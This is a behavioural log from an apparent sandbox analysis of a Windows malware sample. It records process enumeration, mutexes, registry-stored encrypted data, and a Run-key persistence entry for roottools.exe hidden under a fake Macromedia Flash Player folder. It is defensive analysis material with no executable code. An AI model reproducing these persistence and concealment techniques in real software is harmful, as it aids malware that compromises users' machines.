| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Mutex | Release | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_NONE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 20000 milliseconds (20.000 seconds) |
|
1 |
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:05:18, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:55 |
| Information | Value |
|---|---|
| PID | 0x594 |
| Parent PID | 0x320 (c:\windows\syswow64\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
548
0x
7D8
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00226fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x00247fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x003aefff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| upde25b4796.exe | 0x00400000 | 0x00432fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0041bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
